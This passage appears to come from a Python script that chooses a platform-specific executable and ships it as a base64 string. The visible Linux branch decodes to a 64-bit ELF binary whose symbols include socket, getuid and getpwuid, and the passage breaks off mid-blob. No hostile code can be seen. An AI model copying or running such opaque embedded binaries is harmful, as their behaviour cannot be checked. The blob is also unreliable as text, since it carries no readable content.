AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==')
return R
if a.__isLinux64():
R = at(
'f0VMRgIBAQMAAAAAAAAAAAIAPgABAAAAgB1AAAAAAABAAAAAAAAAAICFAAAAAAAAAAAAAEAAOAAIAEAAHwAcAAYAAAAFAAAAQAAAAAAAAABAAEAAAAAAAEAAQAAAAAAAwAEAAAAAAADAAQAAAAAAAAgAAAAAAAAAAwAAAAQAAAAAAgAAAAAAAAACQAAAAAAAAAJAAAAAAAAcAAAAAAAAABwAAAAAAAAAAQAAAAAAAAABAAAABQAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAFV7AAAAAAAAVXsAAAAAAAAAACAAAAAAAAEAAAAGAAAAAIAAAAAAAAAAgGAAAAAAAACAYAAAAAAARAQAAAAAAACIBQAAAAAAAAAAIAAAAAAAAgAAAAYAAAAwgAAAAAAAADCAYAAAAAAAMIBgAAAAAADAAQAAAAAAAMABAAAAAAAACAAAAAAAAAAEAAAABAAAABwCAAAAAAAAHAJAAAAAAAAcAkAAAAAAAEQAAAAAAAAARAAAAAAAAAAEAAAAAAAAAFDldGQEAAAAmGsAAAAAAACYa0AAAAAAAJhrQAAAAAAAtAEAAAAAAAC0AQAAAAAAAAQAAAAAAAAAUeV0ZAYAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAvbGliNjQvbGQtbGludXgteDg2LTY0LnNvLjIABAAAABAAAAABAAAAR05VAAAAAAACAAAABgAAABIAAAAEAAAAFAAAAAMAAABHTlUABpRldLfs0O82MXsrcJO+BfUM5GgDAAAARwAAAAEAAAAGAAAAAAISACEBEAEAAAAARwAAAEkAAABQkgj5If30CShF1UwUmAxDeUlrtgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAALgEAAASAAAAAAAAAAAAAAAAAAAAAAAAALADAAASAAAAAAAAAAAAAAAAAAAAAAAAAEIAAAASAAAAAAAAAAAAAAAAAAAAAAAAAMgFAAASAAAAAAAAAAAAAAAAAAAAAAAAAAQHAAASAAAAAAAAAAAAAAAAAAAAAAAAAKIDAAASAAAAAAAAAAAAAAAAAAAAAAAAAAsHAAASAAAAAAAAAAAAAAAAAAAAAAAAAMQEAAASAAAAAAAAAAAAAAAAAAAAAAAAABQHAAASAAAAAAAAAAAAAAAAAAAAAAAAACICAAASAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAgAAAAAAAAAAAAAAAAAAAAAAAAAB8AAAAgAAAAAAAAAAAAAAAAAAAAAAAAALEBAAASAAAAAAAAAAAAAAAAAAAAAAAAAMUDAAASAAAAAAAAAAAAAAAAAAAAAAAAALoFAAASAAAAAAAAAAAAAAAAAAAAAAAAAMUCAAASAAAAAAAAAAAAAAAAAAAAAAAAABoGAAASAAAAAAAAAAAAAAAAAAAAAAAAADgHAAASAAAAAAAAAAAAAAAAAAAAAAAAAGEGAAASAAAAAAAAAAAAAAAAAAAAAAAAAMsAAAASAAAAAAAAAAAAAAAAAAAAAAAAAA0GAAASAAAAAAAAAAAAAAAAAAAAAAAAAPcGAAASAAAAAAAAAAAAAAAAAAAAAAAAACUEAAASAAAAAAAAAAAAAAAAAAAAAAAAAN4FAAASAAAAAAAAAAAAAAAAAAAAAAAAAOgGAAASAAAAAAAAAAAAAAAAAAAAAAAAADQEAAASAAAAAAAAAAAAAAAAAAAAAAAAAG4CAAASAAAAAAAAAAAAAAAAAAAAAAAAAJMFAAASAAAAAAAAAAAAAAAAAAAAAAAAACEHAAASAAAAAAAAAAAAAAAAAAAAAAAAAOAGAAASAAAAAAAAAAAAAAAAAAAAAAAAAFQBAAASAAAAAAAAAAAAAAAAAAAAAAAAACwHAAASAAAAAAAAAAAAAAAAAAAAAAAAAJ0FAAASAAAAAAAAAAAAAAAAAAAAAAAAADIGAAASAAAAAAAAAAAAAAAAAAAAAAAAALAFAAASAAAAAAAAAAAAAAAAAAAAAAAAACcHAAASAAAAAAAAAAAAAAAAAAAAAAAAAPMBAAASAAAAAAAAAAAAAAAAAAAAAAAAANMCAAASAAAAAAAAAAAAAAAAAAAAAAAAAJcGAAASAAAAAAAAAAAAAAAAAAAAAAAAAMABAAASAAAAAAAAAAAAAAAAAAAAAAAAANIGAAASAAAAAAAAAAAAAAAAAAAAAAAAAGwEAAASAAAAAAAAAAAAAAAAAAAAAAAAADEHAAASAAAAAAAAAAAAAAAAAAAAAAAAAL4AAAASAAAAAAAAAAAAAAAAAAAAAAAAANkGAAASAAAAAAAAAAAAAAAAAAAAAAAAAAYEAAASAAAAAAAAAAAAAAAAAAAAAAAAABoHAAASAAAAAAAAAAAAAAAAAAAAAAAAAEwFAAASAAAAAAAAAAAAAAAAAAAAAAAAADMAAAAgAAAAAAAAAAAAAAAAAAAAAAAAALQCAAASAAAAAAAAAAAAAAAAAAAAAAAAABcFAAASAAAAAAAAAAAAAAAAAAAAAAAAABIBAAASAAAAAAAAAAAAAAAAAAAAAAAAAAEBAAASAAAAAAAAAAAAAAAAAAAAAAAAANUEAAASAAAAAAAAAAAAAAAAAAAAAAAAABUEAAASAAAAAAAAAAAAAAAAAAAAAAAAALoDAAASAAAAAAAAAAAAAAAAAAAAAAAAADYDAAASAAAAAAAAAAAAAAAAAAAAAAAAAIYAAAASAAAAAAAAAAAAAAAAAAAAAAAAAJADAAASAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAASAAAAAAAAAAAAAAAAAAAAAAAAAHYBAAASAAAAAAAAAAAAAAAAAAAAAAAAALkGAAASAAAAAAAAAAAAAAAAAAAAAAAAACwCAAASAAAAAAAAAAAAAAAAAAAAAAAAABsDAAASAAAAAAAAAAAAAAAAAAAAAAAAAO4FAAASAAAAAAAAAAAAAAAAAAAAAAAAAHUAAAASAAAAAAAAAAAAAAAAAAAAAAAAAFMFAAASAAAAAAAAAAAAAAAAAAAAAAAAAEgDAAASAAAAAAAAAAAAAAAAAAAAAAAAAH8CAAASAAAAAAAAAAAAAAAAAAAAAAAAAPEGAAASAAAAAAAAAAAAAAAAAAAAAAAAADkCAAAiAA0ArWhAAAAAAABuAAAAAAAAAMsDAAASAAAAgBxAAAAAAAAAAAAAAAAAAOkAAAASAAAAgBpAAAAAAAAAAAAAAAAAANQFAAARABoAYIRgAAAAAAAQAQAAAAAAAGEBAAASAAAA0BxAAAAAAAAAAAAAAAAAAABsaWJzdGRjKysuc28uNgBfX2dtb25fc3RhcnRfXwBfSnZfUmVnaXN0ZXJDbGFzc2VzAHB0aHJlYWRfY2FuY2VsAF9aTlN0MTRiYXNpY19pZnN0cmVhbUljU3QxMWNoYXJfdHJhaXRzSWNFRTVjbG9zZUV2AF9aTktTczRmaW5kRVBLY20AX1pOU3QxOGJhc2ljX3N0cmluZ3N0cmVhbUljU3QxMWNoYXJfdHJhaXRzSWNFU2FJY0VFRDFFdgBfWk5TYUljRUQxRXYAX1pOU2k1c2Vla2dFbFN0MTJfSW9zX1NlZWtkaXIAX1pOU3Q4aW9zX2Jhc2U0SW5pdEQxRXYAX1pOU29sc0VQRlJTb1NfRQBfWk5TdDE0YmFzaWNfaWZzdHJlYW1JY1N0MTFjaGFyX3RyYWl0c0ljRUVDMUVQS2NTdDEzX0lvc19PcGVubW9kZQBfWk5Tc3BMRVJLU3MAX19neHhfcGVyc29uYWxpdHlfdjAAX1pOS1N0MThiYXNpY19zdHJpbmdzdHJlYW1JY1N0MTFjaGFyX3RyYWl0c0ljRVNhSWNFRTNzdHJFdgBfWk5LU3M1Y19zdHJFdgBfWk5TdDE0YmFzaWNfb2ZzdHJlYW1JY1N0MTFjaGFyX3RyYWl0c0ljRUU1Y2xvc2VFdgBfWk5TdDE0YmFzaWNfb2ZzdHJlYW1JY1N0MTFjaGFyX3RyYWl0c0ljRUVEMUV2AF9aTlNzcExFYwBfWk5Tc2FTRVJLU3MAX1pTdHBsSWNTdDExY2hhcl90cmFpdHNJY0VTYUljRUVTYklUX1QwX1QxX0VSS1M2X1M4XwBfWk5TbzV3cml0ZUVQS2NsAF9aTlN0MTRiYXNpY19pZnN0cmVhbUljU3QxMWNoYXJfdHJhaXRzSWNFRTdpc19vcGVuRXYAX1pOU3M2YXBwZW5kRVBLYwBfWk5LU3M0c2l6ZUV2AF9aTlN0MThiYXNpY19zdHJpbmdzdHJlYW1JY1N0MTFjaGFyX3RyYWl0c0ljRVNhSWNFRUMxRVN0MTNfSW9zX09wZW5tb2RlAF9aTlNvbHNFUEZSU3Q4aW9zX2Jhc2VTMF9FAF9fY3hhX2JlZ2luX2NhdGNoAF9aU3Rsc0ljU3QxMWNoYXJfdHJhaXRzSWNFRVJTdDEzYmFzaWNfb3N0cmVhbUlUX1QwX0VTNl9TdDhfU2V0ZmlsbElTM19FAF9aTlNzOXB1c2hfYmFja0VjAF9aTlNzNWNsZWFyRXYAX1pOU3NDMUV2AF9aTlNpcnNFUm0AX1puYW0AX1pTdDRlbmRsSWNTdDExY2hhcl90cmFpdHNJY0VFUlN0MTNiYXNpY19vc3RyZWFtSVRfVDBfRVM2XwBfWk5TczVlcmFzZUVtbQBfX2N4YV9lbmRfY2F0Y2gAX1pOU2k0cmVhZEVQY2wAX1pTdGxzSVN0MTFjaGFyX3RyYWl0c0ljRUVSU3QxM2Jhc2ljX29zdHJlYW1JY1RfRVM1X1BLYwBfWlN0bHNJY1N0MTFjaGFyX3RyYWl0c0ljRVNhSWNFRVJTdDEzYmFzaWNfb3N0cmVhbUlUX1QwX0VTN19SS1NiSVM0X1M1X1QxX0UAX1pOU3NhU0VQS2MAX1pOS1NzNnN1YnN0ckVtbQBfWk5TdDE0YmFzaWNfb2ZzdHJlYW1JY1N0MTFjaGFyX3RyYWl0c0ljRUVDMUVQS2NTdDEzX0lvc19PcGVubW9kZQBfWk5TdDE0YmFzaWNfb2ZzdHJlYW1JY1N0MTFjaGFyX3RyYWl0c0ljRUU3aXNfb3BlbkV2AF9aZGFQdgBfWlN0bHNJY1N0MTFjaGFyX3RyYWl0c0ljRUVSU3QxM2Jhc2ljX29zdHJlYW1JVF9UMF9FUzZfU3Q1X1NldHcAX1pOU3NEMUV2AF9aTlNzQzFFUEtjUktTYUljRQBfWk5Tc2l4RW0AX1pOU2k1dGVsbGdFdgBfWk5Tc3BMRVBLYwBfWlN0NGNvdXQAX1pOS1NzNmxlbmd0aEV2AF9aTlNzNmFwcGVuZEVSS1NzAF9aTlNhSWNFQzFFdgBfWk5Tc0MxRVJLU3MAX1pOU3Q4aW9zX2Jhc2U0SW5pdEMxRXYAX1pOU3QxNGJhc2ljX2lmc3RyZWFtSWNTdDExY2hhcl90cmFpdHNJY0VFRDFFdgBfWlN0bHNJU3QxMWNoYXJfdHJhaXRzSWNFRVJTdDEzYmFzaWNfb3N0cmVhbUljVF9FUzVfaABfWk5Tb2xzRWoAbGlibS5zby42AGxpYmdjY19zLnNvLjEAX1Vud2luZF9SZXN1bWUAbGliYy5zby42AHNvY2tldABzdHJjcHkAc3ByaW50ZgBnZXRwd3VpZABta2RpcgBfX2N4YV9hdGV4aXQAbWVtc2V0AHNodXRkb3duAGlvY3RsAGdldHVpZABiY29weQBhdG9pAGF0b2wAc3RyY21wAF9fbGliY19zdGFydF9tYWluAEdDQ18zLjAAR0xJQkNfMi4yLjUAQ1hYQUJJXzEuMwBHTElCQ1hYXzMuNAAAAAACAAIAAgACAAMAAgADAAIAAwACAAAAAAACAAIAAgACAAIAAwACAAIAAgADAAIAAgADAAIAAgACAAMAAwACAAMAAgACAAIAAwACAAIAAgACAAMAAgADAAIAAwACAAMAAgAAAAIA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AAAAAAcAAABDAAAAAAAAAAAAAAAohGAAAAAAAAcAAABEAAAAAAAAAAAAAAAwhGAAAAAAAAcAAABFAAAAAAAAAAAAAAA4hGAAAAAAAAcAAABGAAAAAAAAAAAAAABIg+wI6KsEAADoOgUAAOi1UAAASIPECMP/NepoIAD/JexoIAAPH0AA/yXqaCAAaAAAAADp4P////8l4mggAGgBAAAA6dD/////JdpoIABoAgAAAOnA/////yXSaCAAaAMAAADpsP////8lymggAGgEAAAA6aD/////JcJoIABoBQAAAOmQ/////yW6aCAAaAYAAADpgP////8lsmggAGgHAAAA6XD/////JapoIABoCAAAAOlg/////yWiaCAAaAkAAADpUP////8lmmggAGgKAAAA6UD/////JZJoIABoCwAAAOkw/////yWKaCAAaAwAAADpIP////8lgmggAGgNAAAA6RD/////JXpoIABoDgAAAOkA/////yVyaCAAaA8AAADp8P7///8lamggAGgQAAAA6eD+////JWJoIABoEQAAAOnQ/v///yVaaCAAaBIAAADpwP7///8lUmggAGgTAAAA6bD+////JUpoIABoFAAAAOmg/v///yVCaCAAaBUAAADpkP7///8lOmggAGgWAAAA6YD+////JTJoIABoFwAAAOlw/v///yUqaCAAaBgAAADpYP7///8lImggAGgZAAAA6VD+////JRpoIABoGgAAAOlA/v///yUSaCAAaBsAAADpMP7///8lCmggAGgcAAAA6SD+////JQJoIABoHQAAAOkQ/v///yX6ZyAAaB4AAADpAP7///8l8mcgAGgfAAAA6fD9////JepnIABoIAAAAOng/f///yXiZyAAaCEAAADp0P3///8l2mcgAGgiAAAA6cD9////JdJnIABoIwAAAOmw/f///yXKZyAAaCQAAADpoP3///8lwmcgAGglAAAA6ZD9////JbpnIABoJgAAAOmA/f///yWyZyAAaCcAAADpcP3///8lqmcgAGgoAAAA6WD9////JaJnIABoKQAAAOlQ/f///yWaZyAAaCoAAADpQP3///8lkmcgAGgrAAAA6TD9////JYpnIABoLAAAAOkg/f///yWCZyAAaC0AAADpEP3///8lemcgAGguAAAA6QD9////JXJnIABoLwAAAOnw/P///yVqZyAAaDAAAADp4Pz///8lYmcgAGgxAAAA6dD8////JVpnIABoMgAAAOnA/P///yVSZyAAaDMAAADpsPz///8lSmcgAGg0AAAA6aD8////JUJnIABoNQAAAOmQ/P///yU6ZyAAaDYAAADpgPz///8lMmcgAGg3AAAA6XD8////JSpnIABoOAAAAOlg/P///yUiZyAAaDkAAADpUPz///8lGmcgAGg6AAAA6UD8////JRJnIABoOwAAAOkw/P///yUKZyAAaDwAAADpIPz///8lAmcgAGg9AAAA6RD8////JfpmIABoPgAAAOkA/P///yXyZiAAaD8AAADp8Pv///8l6mYgAGhAAAAA6eD7////JeJmIABoQQAAAOnQ+////yXaZiAAaEIAAADpwPv///8l0mYgAGhDAAAA6bD7////JcpmIABoRAAAAOmg+////yXCZiAAaEUAAADpkPv//zHtSYnRXkiJ4kiD5PBQVEnHwCBpQABIx8EwaUAASMfHi2NAAOhn/P//9JCQSIPsCEiLBTlkIABIhcB0Av/QSIPECMOQkJCQkJCQkJCQkJCQVUiJ5VNIg+wIgD2QZyAAAHVLuyCAYABIiwWKZyAASIHrGIBgAEjB+wNIg+sBSDnYcyRmDx9EAABIg8ABSIkFZWcgAP8UxRiAYABIiwVXZyAASDnYcuLGBUNnIAABSIPECFvJw2ZmZi4PH4QAAAAAAEiDPeBhIAAAVUiJ5XQSuAAAAABIhcB0CL8ogGAAyf/gycOQkFVIieVBVkFVQVRTSIHskAEAAEiJ+0iJtVj+//+JlVT+//++CAAAAL8QAAAA6LxGAACJwkiNhWD+//+J1kiJx+i4/P//SMdF2AAAAADrbkiLRdhIi5VY/v//SI0EAg+2AEQPtuC/MAAAAOhGSQAAQYnFvwIAAADoDUcAAEGJxkiNhWD+//9Ig8AQvsRlQABIicfoFv7//0SJ9kiJx+g7/v//RInuSInH6ED+//9EieZIicfoVfz//0iDRdgBi4VU/v//SDtF2A+XwITAdYFIidhIjZVg/v//SInWSInH6Jr9///rIonTSYnESI2FYP7//0iJx+hE/f//TIngSGPTSInH6Ib9//9IjYVg/v//SInH6Cf9//9IidhIidhIgcSQAQAAW0FcQV1BXsnDVUiJ5UFUU0iB7LABAABIib1Y/v//ibVU/v//SImVSP7//8dF5AAAAABIx0XoAAAAAOnkAAAASMdF2AAAAAC+CAAAAL8QAAAA6HVFAACJwkiNhWD+//+J1kiJx+hx+///SItF6EiDwAFIA4VY/v//D7YAD7bYSItF6EiLlVj+//9IjQQCD7YARA+24EiNhWD+//9Ig8AQvsRlQABIicfo3vz//0SJ5kiJx+jj+f//id5Iicfo2fn//0iNVdhIjYVg/v//SInWSInH6BP8//+LReRIA4VI/v//SItV2IgQg0XkAUiNhWD+//9IicfoIPz//0iDRegC6yKJ00mJxEiNhWD+//9IicfoBfz//0yJ4Ehj00iJx+hH/P//i4VU/v//SDtF6A+XwITAD4UH////SIHEsAEAAFtBXMnDVUiJ5VNIg+w4SIl9yEiLRchIicfoFUEAAEiJRdhIx0XgAAAAAMdF6AAAAADrGYtF6EiLVchImA+2BAJID77ASAFF4INF6AGDfeg7D57AhMB13EiDfdgAdQdIg33gAHVdx0XsAAAAAOtCi13si1XsidABwI0MELrJQhayicj36o0EConCwfoEicjB+B+J1inGifBrwBeJyinCidCJwUiLVchIY8OIDAKDRewBg33sOw+ewITAdbO4AAAAAOsFuAEAAABIg8Q4W8nDVUiJ5Yn4iEX8D75F/CX/AAAAycNVSInlQVRTSIHsYA0AAEiJvbjy//9IibWw8v//SIuFsPL//8YAAEiLhbjy//8PtgCEwHUKu//////pbQYAAEiNheD+//9Iicfo1v7//0iNhXD///9IicfoLff//0iNhWD///9IicfoHvf//8aFwPb//wDHRcwAAAAASI1Fj0iJx+iU+v//SI1Vj0iLjbjy//9IjUWASInOSInH6Mr4//9IjZVw////SI1FgL4AAAAASInH6KBDAADrGYnTSYnESI1FgEiJx+hP+P//TIngSGPT6w5IjUWASInH6Dv4///rHInTSYnESI1Fj0iJx+go+f//TIngSGPT6VEFAABIjUWPSInH6BH5//++CAAAAL8EAAAA6JNCAABBicRIjYVw////SInH6PD2//9IicFIjYXQ/P//RIniSInOSInH6Ej5//9IjYXQ/P//SInH6Gn6//+EwA+EqgAAAEiNhdD8//+6AgAAAL4AAAAASInH6Bj3//9IjYXQ/P//SInH6Ln2//9IicFIidBIiY2g8v//SImFqPL//0iLhaDy//9IiUWQSIuFqPL//0iJRZhIjUWQSInH6D9FAACJRcxIjYXQ/P//ugAAAAC+AAAAAEiJx+i39v//i1XMSI2NwPb//0iNhdD8//9Iic5Iicfoy/b//0iNhdD8//9IicfonPX//+noAQAASI1Fr0iJx+gL+f//SI1Vr0iLjbjy//9IjUWgSInOSInH6EH3//9IjZVw////SI1FoL4BAAAASInH6BdCAADrGYnTSYnESI1FoEiJx+jG9v//TIngSGPT6w5IjUWgSInH6LL2///rHInTSYnESI1Fr0iJx+if9///TIngSGPT6ZsDAABIjUWvSInH6Ij3//++CAAAAL8EAAAA6ApBAABBicRIjYVw////SInH6Gf1//9IicFIjYXA+v//RIniSInOSInH6L/3//9IjYXA+v//SInH6OD4//+D8AGEwHQQu/3///9BvAAAAADpyQAAAEiNhcD6//+6AgAAAL4AAAAASInH6ID1//9IjYXA+v//SInH6CH1//9IicFIidBIiY2g8v//SImFqPL//0iLhaDy//9IiUWwSIuFqPL//0iJRbhIjUWwSInH6KdDAACJRcxIjYXA+v//ugAAAAC+AAAAAEiJx+gf9f//i1XMSI2NwPb//0iNhcD6//9Iic5IicfoM/X//0iNhcD6//9IicfoBPT//0G8AQAAAOscidNJicRIjYXA+v//SInH6Mj1//9MieBIY9PrGkiNhcD6//9IicfosfX//0WF5A+EawIAAOsXSInH6A73//+7/f///+jU9v//6VICAACBfcyBAAAAdwq7/P///+k/AgAASI2FwPb//0iNlcDy//+LTcyJzkiJx+jQ+f//SIuFuPL//w+2AIhF0UiLhbjy//9Ig8ABD7YAiEXSx0XUAAAAAOtQi03Ui0XUicAPtoQFwPL//4nCMlXRiciIlAXA8v//D7ZV0Q+2RdEPr9CJ0AHAAdCNUAoPtkXSiYWc8v//idDB+h/3vZzy//+J0IhF0YNF1AGLRczR6DtF1A+XwITAdaHGRdMAx0XYAAAAAOnSAAAAx0XcAAAAAOmzAAAAx0XgAAAAAMdF5AAAAADHRegAAAAA63eLVdiJ0AHAAdABwANF6EiYD7aEBcDy//8PvsCJx+j5+v//icOLVdyJ0AHAAdABwANF6EiYD7aEBeD+//8PvsCJx+jV+v//OcMPlMCEwHQEg0XgAYtV2InQAcAB0AHAA0XoSJgPtoQFwPL//4TAdQSDReQBg0XoAYN96AUPnsCEwA+Fev///4N94AZ1DIN95AZ0BsZF0wHrE4NF3AGDfdwJD57AhMAPhT7///+DRdgBg33YCQ+ewITAD4Uf////D7ZF04PwAYTAdAq7/v///+mYAAAASI2FYP///74gakAASInH6MHx///HRew8AAAA6yWLReyJwA+2hAXA8v//D77QSI2FYP///4nWSInH6Cfy//+DRewBi0XM0eg7RewPl8CEwHXMSI2FYP///0iJx+gV8v//SInCSIuFsPL//0iJ1kiJx+gQ9P//uwAAAADrHInTSYnESI2F0Pz//0iJx+hF8///TIngSGPT6xFIjYXQ/P//SInH6C7z///rHInTSYnESI2FYP///0iJx+i48v//TIngSGPT6xFIjYVg////SInH6KHy///rIonTSYnESI2FcP///0iJx+iL8v//TIngSGPTSInH6K30//9IjYVw////SInH6G7y//+J2EiBxGANAABbQVzJw1VIieVBVFNIgezgAAAASIm9KP///4m1JP///0iJlRj///9IjUWPSInH6DL0//9IjVWPSIuNKP///0iNRYBIic5IicfoaPL//+sfidNJicRIjUWPSInH6AXz//9MieBIY9NIicfoJ/T//0iNRY9Iicfo6/L//0iLhRj////GAABIi4UY////xkAeAEiLhRj////GQEAASIuFGP///8ZASgBIi4UY////xkBoAEiLhRj////HQDwAAAAASI1VgEiNRZBIidZIicfoFPH//4uVJP///0iNRZCJ1kiJx+hvIwAAiEXPSI1FkEiJx+hx8f//6xyJ00mJxEiNRZBIicfoXvH//0yJ4Ehj0+nwBAAAD7ZFz4PwAYTAdAq7AAAAAOkOBQAASI1FgLoAAAAAvkFqQABIicfomPP//0iJRdBIi0XQSI1QAUiNRYC+QWpAAEiJx+h78///SIlF2EiLRdhIjVABSI1FgL5BakAASInH6F7z//9IiUXgSItF4EiNUAFIjUWAvkFqQABIicfoQfP//0iJRehIg33Q/3UISMdF0AAAAABIg33Y/3UISMdF2AAAAABIg33g/3UISMdF4AAAAABIg33o/3UISMdF6AAAAABIg33QAHUfSIN92AB1GEiDfeAAdRFIg33oAHUKuwAAAADpOwQAAEiNhXD///9Ii1XQSI1dgEiJ0boAAAAASIneSInH6Bnv//9IjYVw////SInH6Drv//9Ii5UY////SIPCSkiJxkiJ1+g08f//SItF0EiLVdhIidFIKcFIichIjUj/SItF0EiNUAFIjYVg////SI1dgEiJ3kiJx+jB7v//SI2FYP///0iJx+ji7v//SInCSIuFGP///0iJ1kiJx+jd8P//SItF2EiLVeBIidFIKcFIichIjUj/SItF2EiNUAFIjYVQ////SI1dgEiJ3kiJx+hq7v//SI2FUP///0iJx+iL7v//SIuVGP///0iDwh5IicZIidfohfD//0iNRYBIicfome7//0iJwkiLReBIjXABSI2FQP///0iNXYBIidFIifJIid5IicfoEu7//0iNhUD///9IicfoM+7//0iLlRj///9Ig8JoSInGSInX6C3w//9IjYVA////SInH6D7u//9IjVDxSI2FMP///0iNnUD///9IidG6DwAAAEiJ3kiJx+i57f//SI2FMP///0iJx+ja7f//SIuVGP///0iDwkBIicZIidfo1O///0iNhTD///9Iicfo5e3//0iNUP1IjUWgSI2dMP///0iJ0boDAAAASIneSInH6GPt//9IjUWgSInH6Ift//9Iicfo/+7//0iLlRj///+JQjxIjUWgSInH6Gnu///rHInTSYnESI1FoEiJx+hW7v//TIngSGPT6RgBAABIjUWwSI2dMP///7kDAAAAugAAAABIid5Iicfo++z//0iNVbBIjYUw////SInWSInH6FXw///rHInTSYnESI1FsEiJx+gC7v//TIngSGPT6cQAAABIjUWwSInH6Ovt//9IjYUw////SInH6Nzs//9Ii5UY////SIPCQEiJxkiJ1+jW7v//SI1FwEiNnUD///+5DwAAALoAAAAASIneSInH6Hbs//9IjVXASI2FQP///0iJ1kiJx+jQ7///6xmJ00mJxEiNRcBIicfofe3//0yJ4Ehj0+tCSI1FwEiJx+hp7f//SI2FQP///0iJx+ha7P//SIuVGP///0iDwmhIicZIidfoVO7//0iNhTD///9IicfoNe3//+s4idNJicRIjYUw////SInH6B/t//9MieBIY9PrAInTSYnESI2FQP///0iJx+gD7f//TIngSGPT6xFIjYVA////SInH6Ozs///rHInTSYnESI2FUP///0iJx+jW7P//TIngSGPT6xFIjYVQ////SInH6L/s///rHInTSYnESI2FYP